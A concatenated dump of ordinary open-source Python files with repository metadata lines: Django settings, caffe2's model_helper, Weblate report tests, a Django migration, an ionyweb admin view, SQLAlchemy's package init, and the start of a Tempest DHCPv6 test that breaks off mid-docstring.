DATABASE_ENGINE = ''
DATABASE_NAME = ''
DATABASE_USER = ''
DATABASE_PASSWORD = ''
DATABASE_HOST = ''
DATABASE_PORT = ''
# URL that handles the media served from MEDIA_ROOT
MEDIA_URL = ''
# Make this unique and don't share it with anybody
SECRET_KEY = ''
"""
import os
DIRNAME = os.path.dirname(__file__)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
USE_I8N = False
ADMINS = ()
MANAGERS = ADMINS
# Local time zone for this installation. All choices can be found here:
# http://www.postgresql.org/docs/current/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
TIME_ZONE = 'Europe/Belfast'
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en-gb'
SITE_ID = 1
# Absolute path to the directory that holds media
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(DIRNAME, 'media')
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/"
ADMIN_MEDIA_PREFIX = '/admin_media/'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.load_template_source',
'django.template.loaders.app_directories.load_template_source',
)
# List of processors used by RequestContext to populate the context.
# Each one should be a callable that takes the request object as its
# only parameter and returns a dictionary to add to the context.
TEMPLATE_CONTEXT_PROCESSORS = (
'soclone.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.media',
'soclone.context_processors.request_path',
)
# List of middleware classes to use. Order is important; in the request phase,
# this middleware classes will be applied in the order given, and in the
# response phase the middleware will be applied in reverse order.
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.doc.XViewMiddleware',
'django.middleware.transaction.TransactionMiddleware',
)
ROOT_URLCONF = 'soclone.urls'
TEMPLATE_DIRS = (
os.path.join(DIRNAME, 'templates'),
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.humanize',
'django_html',
'soclone',
)
LOGIN_URL = '/login/'
LOGIN_REDIRECT_URL = '/'
LOGOUT_URL = '/logout/'
try:
from soclone.local_settings import *
except ImportError:
pass
| mit | 7,243,192,881,112,871,000 | 28.096154 | 98 | 0.727032 | false |
bwasti/caffe2 | caffe2/python/model_helper.py | 1 | 22712 | ## @package model_helper
# Module caffe2.python.model_helper
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import core, scope, workspace
from caffe2.python.modeling import parameter_info
from caffe2.python.modeling.parameter_sharing import (
parameter_sharing_context,
)
from caffe2.python.optimizer_context import (
OptimizerContext,
DEFAULT_OPTIM,
)
from caffe2.proto import caffe2_pb2
from future.utils import viewitems, viewkeys
from itertools import chain
import logging
import six
# _known_working_ops are operators that do not need special care.
_known_working_ops = [
"Accuracy",
"Adam",
"Add",
"Adagrad",
"SparseAdagrad",
"AveragedLoss",
"Cast",
"Checkpoint",
"ConstantFill",
"Copy",
"CopyGPUToCPU",
"CopyCPUToGPU",
"DequeueBlobs",
"EnsureCPUOutput",
"ExpandDims",
"Flatten",
"FlattenToVec",
"LabelCrossEntropy",
"LearningRate",
"MakeTwoClass",
"MatMul",
"NCCLAllreduce",
"NHWC2NCHW",
"PackSegments",
"Print",
"PRelu",
"Scale",
"ScatterWeightedSum",
"Sigmoid",
"SortedSegmentSum",
"Snapshot", # Note: snapshot is deprecated, use Checkpoint
"Softmax",
"SoftmaxWithLoss",
"SquaredL2Distance",
"Squeeze",
"StopGradient",
"Summarize",
"Tanh",
"Transpose",
"UnpackSegments",
"WeightedSum",
"ReduceFrontSum",
]
class ModelHelper(object):
"""A helper model so we can manange models more easily. It contains net def
and parameter storages. You can add an Operator yourself, e.g.
model = model_helper.ModelHelper(name="train_net")
# init your weight and bias as w and b
w = model.param_init_net.XavierFill(...)
b = model.param_init_net.ConstantFill(...)
fc1 = model.FC([input, w, b], output, **kwargs)
or you can use helper functions in brew module without manually
defining parameter initializations and operators.
model = model_helper.ModelHelper(name="train_net")
fc1 = brew.fc(model, input, output, dim_in, dim_out, **kwargs)
"""
def __init__(self, name=None, init_params=True, allow_not_known_ops=True,
skip_sparse_optim=False, param_model=None, arg_scope=None):
self.name = name or "model"
self.net = core.Net(self.name)
if param_model is not None:
self.param_init_net = param_model.param_init_net
self.param_to_grad = param_model.param_to_grad
self.params = param_model.params
self._parameters_info = param_model._parameters_info
self._computed_params = param_model._computed_params
else:
self.param_init_net = core.Net(self.name + '_init')
self.param_to_grad = {}
self.params = []
self._parameters_info = {}
self._computed_params = []
self._param_info_deprecated = []
self._devices = []
self.gradient_ops_added = False
self.init_params = init_params
self.allow_not_known_ops = allow_not_known_ops
self.skip_sparse_optim = skip_sparse_optim
self.weights = []
self.biases = []
self._arg_scope = {
'order': "NCHW",
'use_cudnn': True,
'cudnn_exhaustive_search': False,
}
if arg_scope is not None:
# Please notice value as None is not acceptable. We are not checking it
# here because we already have check in MakeArgument.
self._arg_scope.update(arg_scope)
@property
def arg_scope(self):
return self._arg_scope
def get_name(self):
return self.name
def _infer_param_shape(self, param):
for op in self.param_init_net.Proto().op:
if str(param) in op.output:
for arg in op.arg:
if arg.name == "shape":
return list(arg.ints)
return None
def _update_param_info_deprecated(self):
assert len(self._param_info_deprecated) <= len(self.params)
for param in self.params[len(self._param_info_deprecated):]:
if not isinstance(param, core.BlobReference):
raise ValueError(
"Param %s must be a BlobReference!" % str(param))
self._param_info_deprecated.append(parameter_info.ParameterInfo(
param_id=len(self._param_info_deprecated),
param=param,
shape=self._infer_param_shape(param)))
for info in self._param_info_deprecated:
info.grad = self.param_to_grad.get(info.name)
def _normalize_tags(self, tags):
tags = tags or []
return set(tags) if isinstance(tags, list) else set([tags])
def create_param(self, param_name, shape, initializer, tags=None):
"""
Creates parameter with a given name and initializer.
If param_name is instance of BlobRefernce - then this blob will be used
to store parameter (no any logic will affect it's location).
If param_name is instance of a string type, then the final blob will
be created in the CurrentNameScope with the respect of all parameter
sharing logic, i.e. 'resolved_name_scope/param_name'.
Parameter sharing logic is going to override CurrentNameScope accoring
to the rules that are specified through ParameterSharing contexts,
all ParameterSharing contexts are applied recursively until there are no
extra overrides present, where on each step the best match will be
applied first.
The following examples should clarify the way ParameterSharing logic
works:
As an example if this function is called with parameter 'w':
a. Call from some scope 'global_scope' with no Parameter sharing:
'global_scope/w'
b. Call from scope 'scope_b', with override {'scope_b': 'scope_a'}:
'scope_a/w'
c. Call from scope 'scope_a', with override {'scope_a': ''}:
'scope_a/w'
d. Call from scope 'scope_b/shared', with overrides
{'scope_b/shared': 'scope_b', 'scope_b': 'scope_a'}:
'scope_a/w'
d. Call from scope 'scope_b/unshared', with overrides
{'scope_b/shared': 'scope_b', 'scope_b': 'scope_a'}:
'scope_a/unshared/w'
"""
# ParameterSharing works only for case when param_name is instance of
# a string type. If param_name is a BlobReference - no attempt for
# ParameterSharing will be applied.
if isinstance(param_name, core.BlobReference):
param_name = str(param_name)
elif isinstance(param_name, six.string_types):
# Parameter name will be equal to current Namescope that got
# resolved with the respect of parameter sharing of the scopes.
param_name = parameter_sharing_context.get_parameter_name(
param_name)
else:
raise "Unsupported type for param_name"
if param_name in self._parameters_info:
assert self._parameters_info[param_name].shape == shape
return self._parameters_info[param_name].blob
param_info = initializer.create_param(
param_name=core.BlobReference(param_name),
init_net=self.param_init_net,
shape=shape,
)
optim_context = OptimizerContext.current()
for tag in self._normalize_tags(tags):
if optim_context.has_optimizer(tag):
# param_info will check optimizer has not been set
param_info.optimizer = optim_context.get_optimizer(tag)
if not param_info.optimizer and optim_context.has_optimizer(DEFAULT_OPTIM):
param_info.optimizer = optim_context.get_optimizer(DEFAULT_OPTIM)
self._parameters_info[param_name] = param_info
# Add param to legacy structs as well, so all other functions for
# parameters are still working.
self.AddParameter(param_info.blob, tags)
return param_info.blob
def get_param_info(self, param):
assert isinstance(param, core.BlobReference), \
"Param {} is not a BlobReference".format(param)
return self._parameters_info.get(param, None)
# This method is deprecated, use create_param method which
# also does parameter initialization when needed
def add_param_DEPRECATED(self, param, key=None, shape=None, length=None):
logging.warning("add_param method is DEPRECATED")
self._update_param_info_deprecated()
self.AddParameter(param)
if key is not None and self.net.input_record() is not None:
idx = self.net.input_record().field_blobs().index(key)
key = self.net.input_record().field_names()[idx]
shape = shape if shape is not None else self._infer_param_shape(param)
if not isinstance(param, core.BlobReference):
raise ValueError("Param %s must be a BlobReference!" % str(param))
self._param_info_deprecated.append(parameter_info.ParameterInfo(
param_id=len(self._param_info_deprecated),
param=param,
shape=shape,
key=key,
length=length,
))
return self._param_info_deprecated[-1]
# This method is deprecated, use get_param_info method
def param_info(self, grad_type=None, id=None):
logging.info("param_info method is DEPRECATED")
self._update_param_info_deprecated()
if id is not None:
assert grad_type is None
info = self._param_info_deprecated[id]
assert info.param_id == id
return info
elif grad_type is not None:
return [
info for info in self._param_info_deprecated
if info.grad_type() == grad_type]
else:
return self._param_info_deprecated
def AddParameter(self, param, tags=None):
assert isinstance(param, core.BlobReference)
tags = self._normalize_tags(tags)
if parameter_info.ParameterTags.COMPUTED_PARAM in tags:
self._computed_params.append(param)
else:
self.params.append(param)
if parameter_info.ParameterTags.WEIGHT in tags:
self.weights.append(param)
if parameter_info.ParameterTags.BIAS in tags:
self.biases.append(param)
@staticmethod
def _NormalizeNamescope(namescope):
if namescope is None:
return scope.CurrentNameScope()
elif namescope == '' or namescope.endswith(scope._NAMESCOPE_SEPARATOR):
return namescope
else:
return namescope + scope._NAMESCOPE_SEPARATOR
def GetParams(self, namescope=None, top_scope=False):
'''
Returns the params in current namescope
'''
namescope = ModelHelper._NormalizeNamescope(namescope)
if namescope == '':
return self.params[:]
elif top_scope:
return [
p for p in self.params
if p.GetNameScope().startswith(namescope)
]
else:
return [p for p in self.params if
p.GetNameScope().startswith(namescope)]
def Proto(self):
return self.net.Proto()
def InitProto(self):
return self.param_init_net.Proto()
def RunAllOnGPU(self, *args, **kwargs):
self.param_init_net.RunAllOnGPU(*args, **kwargs)
self.net.RunAllOnGPU(*args, **kwargs)
def CreateDB(self, blob_out, db, db_type, **kwargs):
dbreader = self.param_init_net.CreateDB(
[], blob_out, db=db, db_type=db_type, **kwargs)
return dbreader
def AddGradientOperators(self, *args, **kwargs):
if self.gradient_ops_added:
raise RuntimeError("You cannot run AddGradientOperators twice.")
self.Validate()
self.gradient_ops_added = True
self.grad_map = self.net.AddGradientOperators(*args, **kwargs)
self.param_to_grad = self.get_param_to_grad(self.params)
# Populate ParameterInfo for all parameters if missing
# and add gradient blob information. So optimizers can use it
for param, grad in self.param_to_grad.items():
param_info = self.get_param_info(param)
if param_info:
param_info.grad = grad
else:
self._parameters_info[param] = parameter_info.ParameterInfo(
param_id=None,
param=param,
grad=grad,
)
return self.grad_map
def get_param_to_grad(self, params):
'''
Given a list of parameters returns a dict from a parameter
to a corresponding gradient
'''
param_to_grad = {}
if not self.gradient_ops_added:
raise RuntimeError("You need to run AddGradientOperators first.")
# We need to use empty namescope when creating the gradients
# to prevent duplicating the namescope prefix for gradient blobs.
for p in params:
if str(p) in self.grad_map:
param_to_grad[p] = self.grad_map[str(p)]
return param_to_grad
def GetOptimizationParamInfo(self, params=None):
'''
Returns a map for param => grad.
If params is not specified, all parameters will be considered.
'''
if not self.gradient_ops_added:
raise RuntimeError("Need to call AddGradientOperators first")
param_to_grad = self.param_to_grad
if params:
param_to_grad = self.get_param_to_grad(params)
return [
self.get_param_info(param) for param, grad in viewitems(param_to_grad)
if (
not self.skip_sparse_optim or
not isinstance(grad, core.GradientSlice)
)
]
def _Validate(self):
'''
Check for duplicate params
'''
params_list = [str(p) for p in self.params]
params_set = set(params_list)
dupes = []
if len(params_set) != len(params_list):
params_list = sorted(params_list)
for j, p in enumerate(params_list):
if j > 0 and params_list[j - 1] == p:
if p not in dupes:
dupes.append(p)
return dupes
def Validate(self):
dupes = self._Validate()
assert dupes == [], "Duplicate params: {}".format(dupes)
def GetComputedParams(self, namescope=None):
'''
Returns the computed params in current namescope. 'Computed params'
are such parameters that are not optimized via gradient descent but are
directly computed from data, such as the running mean and variance
of Spatial Batch Normalization.
'''
namescope = ModelHelper._NormalizeNamescope(namescope)
if namescope == '':
return self._computed_params[:]
else:
return [p for p in self._computed_params
if p.GetNameScope().startswith(namescope)]
def GetAllParams(self, namescope=None):
return self.GetParams(namescope) + self.GetComputedParams(namescope)
def TensorProtosDBInput(
self, unused_blob_in, blob_out, batch_size, db, db_type, **kwargs
):
"""TensorProtosDBInput."""
dbreader_name = "dbreader_" + db
dbreader = self.param_init_net.CreateDB(
[], dbreader_name,
db=db, db_type=db_type)
return self.net.TensorProtosDBInput(
dbreader, blob_out, batch_size=batch_size)
def GetDevices(self):
assert len(self._devices) > 0, \
"Use data_parallel_model to run model on multiple GPUs."
return self._devices
def __getattr__(self, op_type):
"""Catch-all for all other operators, mostly those without params."""
if op_type.startswith('__'):
raise AttributeError(op_type)
if not core.IsOperator(op_type):
raise RuntimeError(
'Method ' + op_type + ' is not a registered operator.' +
' Did you mean: [' +
','.join(workspace.C.nearby_opnames(op_type)) + ']'
)
if op_type not in _known_working_ops:
if not self.allow_not_known_ops:
raise RuntimeError(
"Operator {} is not known to be safe".format(op_type))
logging.warning("You are creating an op that the ModelHelper "
"does not recognize: {}.".format(op_type))
return self.net.__getattr__(op_type)
def __dir__(self):
return sorted(set(chain(
dir(type(self)),
viewkeys(self.__dict__),
_known_working_ops
)))
def ExtractPredictorNet(
net_proto,
input_blobs,
output_blobs,
device=None,
renames=None,
disabled_inputs=None,
):
'''
Takes a model net for training and returns a net which can be
used for prediction. For example, all gradient operators and
input operators are removed.
@param net_proto protobuf of the net you want to process (net.Proto())
@param input_blobs list/set of blob names that are the inputs of predictor
@param output_blobs list/set of blob names that are outputs of predictor
@param device optional device option that is assigned
@param renames dictionary of blob name to a new name (optional)
@param disabled_inputs optional set of blobs that are 'switched off'. This
will cause branches with those blobs as inputs to be removed
'''
predict_net = core.Net(net_proto.name + "_predict")
predict_proto = predict_net.Proto()
orig_external_inputs = set(net_proto.external_input)
orig_external_outputs = set(net_proto.external_output)
input_blobs = {str(b) for b in input_blobs}
known_blobs = set(orig_external_inputs).union(input_blobs)
output_blobs = {str(b) for b in output_blobs}
external_inputs = set(input_blobs)
external_outputs = set(output_blobs)
if renames is None:
renames = {}
if disabled_inputs is not None:
known_blobs = known_blobs - set(disabled_inputs)
ops = list(net_proto.op)
# Find the range of ops that we should include
try:
first_op_with_input = min(
[
j for j in range(len(ops))
if input_blobs.intersection(ops[j].input) and ops[j].type !=
'StopGradient'
]
)
except ValueError:
raise Exception("No ops with input={}".format(input_blobs))
try:
last_op_with_output = max(
[
j for j in range(len(ops))
if output_blobs.intersection(ops[j].output)
]
)
except ValueError:
raise Exception("No ops with output={}".format(output_blobs))
def validate_op(op):
# Check that the op does not have is_test = 0 set. This is a common
# pitfall with SpatialBN op, at lest.
for arg in op.arg:
if arg.name == "is_test" and arg.i == 0:
raise Exception(
"An operator had is_test=0, did you try to extract a " +
"predictor from a train model (instead of test model)?" +
" Op was: {}".format(str(op))
)
# Iterate through the ops and only include those whose inputs
# we can satisfy.
for op in ops[first_op_with_input:(last_op_with_output + 1)]:
if known_blobs.issuperset(op.input):
# Special handling for recurrent nets
# TODO: when standard argument type for "nets" is introduced,
# this can be more general
if op.type == 'RecurrentNetwork':
import google.protobuf.text_format as protobuftx
for arg in op.arg:
if arg.name == 'backward_step_net':
arg.s = b""
elif arg.name == 'step_net':
step_proto = caffe2_pb2.NetDef()
protobuftx.Merge(arg.s.decode("ascii"), step_proto)
for step_op in step_proto.op:
if device is not None:
step_op.device_option.device_type = device.device_type
step_op.device_option.cuda_gpu_id = device.cuda_gpu_id
# Add additional external inputs
external_inputs.update(
set(step_proto.external_input).intersection(
orig_external_inputs
)
)
arg.s = str(step_proto).encode("ascii")
if device is not None:
op.device_option.device_type = device.device_type
op.device_option.cuda_gpu_id = device.cuda_gpu_id
validate_op(op)
predict_proto.op.extend([op])
known_blobs.update(op.output)
external_inputs.update(
set(op.input).intersection(orig_external_inputs)
)
external_outputs.update(
set(op.output).intersection(orig_external_outputs)
)
else:
logging.debug(
"Op {} had unknown inputs: {}".format(
op.type, set(op.input).difference(known_blobs)
)
)
def rename_list(proto_list):
# proto lists don't support assignments
new_list = proto_list[:]
for j, b in enumerate(new_list):
if b in renames:
new_list[j] = renames[b]
del proto_list[:]
proto_list.extend(new_list)
# Predictor net's external inputs and outputs include only those
# that are part of this net.
predict_proto.external_input.extend(external_inputs)
predict_proto.external_output.extend(external_outputs)
rename_list(predict_proto.external_input)
rename_list(predict_proto.external_output)
renamed_input_blobs = []
for b in input_blobs:
if b in renames:
renamed_input_blobs.append(renames[b])
else:
renamed_input_blobs.append(b)
for op in predict_proto.op:
rename_list(op.input)
rename_list(op.output)
return predict_net, list(
set(predict_proto.external_input) - set(renamed_input_blobs)
)
| apache-2.0 | 2,902,912,391,106,800,000 | 35.691438 | 86 | 0.591273 | false |
matejcik/weblate | weblate/trans/tests/test_reports.py | 3 | 5000 | # -*- coding: utf-8 -*-
#
# Copyright © 2012 - 2016 Michal Čihař <[email protected]>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from datetime import timedelta
import json
from django.core.urlresolvers import reverse
from django.utils import timezone
from weblate.trans.tests.test_views import ViewTestCase
from weblate.trans.views.reports import generate_credits, generate_counts
class ReportsTest(ViewTestCase):
def setUp(self):
super(ReportsTest, self).setUp()
self.user.is_superuser = True
self.user.save()
def add_change(self):
self.edit_unit(
'Hello, world!\n',
'Nazdar svete!\n'
)
def test_credits_empty(self):
data = generate_credits(
self.subproject,
timezone.now() - timedelta(days=1),
timezone.now() + timedelta(days=1)
)
self.assertEqual(data, [])
def test_credits_one(self):
self.add_change()
data = generate_credits(
self.subproject,
timezone.now() - timedelta(days=1),
timezone.now() + timedelta(days=1)
)
self.assertEqual(
data,
[{'Czech': [('[email protected]', 'Weblate Test')]}]
)
def test_credits_more(self):
self.edit_unit(
'Hello, world!\n',
'Nazdar svete2!\n'
)
self.test_credits_one()
def get_credits(self, style):
self.add_change()
return self.client.post(
reverse('credits', kwargs=self.kw_subproject),
{
'style': style,
'start_date': '2000-01-01',
'end_date': '2100-01-01'
},
)
def test_credits_view_json(self):
response = self.get_credits('json')
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(
data,
[{'Czech': [['[email protected]', 'Weblate Test']]}]
)
def test_credits_view_rst(self):
response = self.get_credits('rst')
self.assertEqual(
response.content.decode('utf-8'),
'\n\n* Czech\n\n * Weblate Test <[email protected]>\n\n'
)
def test_credits_view_html(self):
response = self.get_credits('html')
self.assertHTMLEqual(
response.content.decode('utf-8'),
'<table>\n'
'<tr>\n<th>Czech</th>\n'
'<td><ul><li><a href="mailto:[email protected]">'
'Weblate Test</a></li></ul></td>\n</tr>\n'
'</table>'
)
def test_counts_one(self):
self.add_change()
data = generate_counts(
self.subproject,
timezone.now() - timedelta(days=1),
timezone.now() + timedelta(days=1)
)
self.assertEqual(
data,
[{
'count': 1,
'name': 'Weblate Test',
'words': 2,
'email': '[email protected]'
}]
)
def get_counts(self, style):
self.add_change()
return self.client.post(
reverse('counts', kwargs=self.kw_subproject),
{
'style': style,
'start_date': '2000-01-01',
'end_date': '2100-01-01'
},
)
def test_counts_view_json(self):
response = self.get_counts('json')
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(
data,
[{
'count': 1,
'email': '[email protected]',
'name': 'Weblate Test',
'words': 2
}]
)
def test_counts_view_rst(self):
response = self.get_counts('rst')
self.assertContains(response, '[email protected]')
def test_counts_view_html(self):
response = self.get_counts('html')
self.assertHTMLEqual(
response.content.decode('utf-8'),
'<table>\n'
'<tr><th>Name</th><th>Email</th><th>Words</th><th>Count</th></tr>'
'\n'
'<tr>\n<td>Weblate Test</td>\n'
'<td>[email protected]</td>\n'
'<td>2</td>\n<td>1</td>\n'
'\n</tr>\n</table>'
)
| gpl-3.0 | 8,745,143,199,600,205,000 | 29.284848 | 78 | 0.537723 | false |
praekelt/seed-stage-based-messaging | subscriptions/migrations/0003_auto_20160322_1534.py | 2 | 1901 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-03-22 15:34
from __future__ import unicode_literals
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("contentstore", "0002_messageset_content_type"),
("subscriptions", "0002_auto_20160224_0822"),
]
operations = [
migrations.RemoveField(model_name="subscription", name="messageset_id"),
migrations.AddField(
model_name="subscription",
name="messageset",
field=models.ForeignKey(
default=1,
on_delete=django.db.models.deletion.CASCADE,
related_name="subscriptions",
to="contentstore.MessageSet",
),
preserve_default=False,
),
migrations.AlterField(
model_name="subscription",
name="created_by",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="subscriptions_created",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AlterField(
model_name="subscription",
name="schedule",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="subscriptions",
to="contentstore.Schedule",
),
),
migrations.AlterField(
model_name="subscription",
name="updated_by",
field=models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="subscriptions_updated",
to=settings.AUTH_USER_MODEL,
),
),
]
| bsd-3-clause | -1,693,147,647,634,246,400 | 31.220339 | 80 | 0.54708 | false |
makinacorpus/ionyweb | ionyweb/administration/views/action.py | 2 | 2947 | # -*- coding: utf-8 -*-
from django.conf import settings
from django.core.urlresolvers import resolve
from django.http import Http404
from djangorestframework.response import ErrorResponse
from djangorestframework import status
from ionyweb.plugin.models import PluginRelation
from ionyweb.administration.views import IsAdminView
from ionyweb.administration.utils import MESSAGES, check_object_html_id
class ActionView(IsAdminView):
"""
Views dispatcher for actions of objects.
"""
def base_view(self, request, html_id_object, url_action):
"""
Basic View of actions admin.
This method gets the object related to the request
and return the action asked.
"""
# Get and check app/plugin object HTML ID
# Types accepted : PluginRelation or App
# If slug not valid => raise HTTP_400_BAD_REQUEST
object_type, object_id = check_object_html_id(
html_id_object, types=[settings.SLUG_PLUGIN, settings.SLUG_APP])
# Case #1 - Object Type : PluginRelation
if object_type == settings.SLUG_PLUGIN:
# Get plugin relation
try:
obj_relation = PluginRelation.objects\
.get(id__exact=object_id)
except PluginRelation.DoesNotExist:
# If the plugin is not found => 404
raise ErrorResponse(status.HTTP_404_NOT_FOUND,
{'msg': MESSAGES.get('default_error', "")})
# Get plugin object
obj = obj_relation.content_object
# Case #2 - Object Type : App
# Necessarily : object_type == settings.SLUG_APP:
else:
# Get app object
obj = request.page.app_page_object
# We check that slug parameter is correct
if obj.pk != int(object_id):
raise ErrorResponse(status.HTTP_404_NOT_FOUND,
{'msg': MESSAGES.get('default_error', "")})
# Formatting url action
# (add '/' at the begining and the ending)
if url_action[0] != '/':
url_action = '/' + url_action
if url_action[-1] != '/':
url_action = url_action + '/'
# Dispatcher View
try:
match = resolve(url_action, urlconf=obj.get_actions_urlconf())
return match.func(request, html_id_object, obj, **match.kwargs)
except Http404:
raise ErrorResponse(status.HTTP_404_NOT_FOUND,
{'msg': MESSAGES.get('action_not_found', "")})
def get(self, *args, **kwargs):
return self.base_view(*args, **kwargs)
def put(self, *args, **kwargs):
return self.base_view(*args, **kwargs)
def post(self, *args, **kwargs):
return self.base_view(*args, **kwargs)
def delete(self, *args, **kwargs):
return self.base_view(*args, **kwargs)
| bsd-3-clause | 2,270,526,240,031,009,300 | 35.382716 | 79 | 0.582626 | false |
EvaSDK/sqlalchemy | lib/sqlalchemy/__init__.py | 6 | 2113 | # sqlalchemy/__init__.py
# Copyright (C) 2005-2015 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from .sql import (
alias,
and_,
asc,
between,
bindparam,
case,
cast,
collate,
column,
delete,
desc,
distinct,
except_,
except_all,
exists,
extract,
false,
func,
funcfilter,
insert,
intersect,
intersect_all,
join,
literal,
literal_column,
modifier,
not_,
null,
or_,
outerjoin,
outparam,
over,
select,
subquery,
table,
text,
true,
tuple_,
type_coerce,
union,
union_all,
update,
)
from .types import (
BIGINT,
BINARY,
BLOB,
BOOLEAN,
BigInteger,
Binary,
Boolean,
CHAR,
CLOB,
DATE,
DATETIME,
DECIMAL,
Date,
DateTime,
Enum,
FLOAT,
Float,
INT,
INTEGER,
Integer,
Interval,
LargeBinary,
NCHAR,
NVARCHAR,
NUMERIC,
Numeric,
PickleType,
REAL,
SMALLINT,
SmallInteger,
String,
TEXT,
TIME,
TIMESTAMP,
Text,
Time,
TypeDecorator,
Unicode,
UnicodeText,
VARBINARY,
VARCHAR,
)
from .schema import (
CheckConstraint,
Column,
ColumnDefault,
Constraint,
DefaultClause,
FetchedValue,
ForeignKey,
ForeignKeyConstraint,
Index,
MetaData,
PassiveDefault,
PrimaryKeyConstraint,
Sequence,
Table,
ThreadLocalMetaData,
UniqueConstraint,
DDL,
)
from .inspection import inspect
from .engine import create_engine, engine_from_config
__version__ = '1.1.0b1'
def __go(lcls):
global __all__
from . import events
from . import util as _sa_util
import inspect as _inspect
__all__ = sorted(name for name, obj in lcls.items()
if not (name.startswith('_') or _inspect.ismodule(obj)))
_sa_util.dependencies.resolve_all("sqlalchemy")
__go(locals())
| mit | -3,461,235,421,455,484,000 | 14.311594 | 77 | 0.587317 | false |
roopali8/tempest | tempest/api/network/test_dhcp_ipv6.py | 9 | 18480 | # Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
import random
import six
from tempest_lib.common.utils import data_utils
from tempest_lib import exceptions as lib_exc
from tempest.api.network import base
from tempest import config
from tempest import test
CONF = config.CONF
class NetworksTestDHCPv6(base.BaseNetworkTest):
_ip_version = 6
""" Test DHCPv6 specific features using SLAAC, stateless and
stateful settings for subnets. Also it shall check dual-stack
functionality (IPv4 + IPv6 together).
The tests include:
generating of SLAAC EUI-64 address in subnets with various settings
receiving SLAAC addresses in combinations of various subnets
receiving stateful IPv6 addresses
addressing in subnets with router
"""
@classmethod
def skip_checks(cls):
super(NetworksTestDHCPv6, cls).skip_checks()
msg = None
if not CONF.network_feature_enabled.ipv6:
msg = "IPv6 is not enabled"
elif not CONF.network_feature_enabled.ipv6_subnet_attributes:
msg = "DHCPv6 attributes are not enabled."
if msg:
raise cls.skipException(msg)
@classmethod
def resource_setup(cls):
super(NetworksTestDHCPv6, cls).resource_setup()
cls.network = cls.create_network()
def _remove_from_list_by_index(self, things_list, elem):
for index, i in enumerate(things_list):
if i['id'] == elem['id']:
break
del things_list[index]
def _clean_network(self):
body = self.client.list_ports()
ports = body['ports']
for port in ports:
if (port['device_owner'].startswith('network:router_interface')
and port['device_id'] in [r['id'] for r in self.routers]):
self.client.remove_router_interface_with_port_id(
port['device_id'], port['id']
)
else:
if port['id'] in [p['id'] for p in self.ports]:
self.client.delete_port(port['id'])
self._remove_from_list_by_index(self.ports, port)
body = self.client.list_subnets()
subnets = body['subnets']
for subnet in subnets:
if subnet['id'] in [s['id'] for s in self.subnets]:
self.client.delete_subnet(subnet['id'])
self._remove_from_list_by_index(self.subnets, subnet)
body = self.client.list_routers()
routers = body['routers']
for router in routers:
if router['id'] in [r['id'] for r in self.routers]:
self.client.delete_router(router['id'])
self._remove_from_list_by_index(self.routers, router)
def _get_ips_from_subnet(self, **kwargs):
subnet = self.create_subnet(self.network, **kwargs)
port_mac = data_utils.rand_mac_address()
port = self.create_port(self.network, mac_address=port_mac)
real_ip = next(iter(port['fixed_ips']), None)['ip_address']
eui_ip = data_utils.get_ipv6_addr_by_EUI64(subnet['cidr'],
port_mac).format()
return real_ip, eui_ip
@test.idempotent_id('e5517e62-6f16-430d-a672-f80875493d4c')
def test_dhcpv6_stateless_eui64(self):
"""When subnets configured with RAs SLAAC (AOM=100) and DHCP stateless
(AOM=110) both for radvd and dnsmasq, port shall receive IP address
calculated from its MAC.
"""
for ra_mode, add_mode in (
('slaac', 'slaac'),
('dhcpv6-stateless', 'dhcpv6-stateless'),
):
kwargs = {'ipv6_ra_mode': ra_mode,
'ipv6_address_mode': add_mode}
real_ip, eui_ip = self._get_ips_from_subnet(**kwargs)
self._clean_network()
self.assertEqual(eui_ip, real_ip,
('Real port IP is %s, but shall be %s when '
'ipv6_ra_mode=%s and ipv6_address_mode=%s') % (
real_ip, eui_ip, ra_mode, add_mode))
@test.idempotent_id('ae2f4a5d-03ff-4c42-a3b0-ce2fcb7ea832')
def test_dhcpv6_stateless_no_ra(self):
"""When subnets configured with dnsmasq SLAAC and DHCP stateless
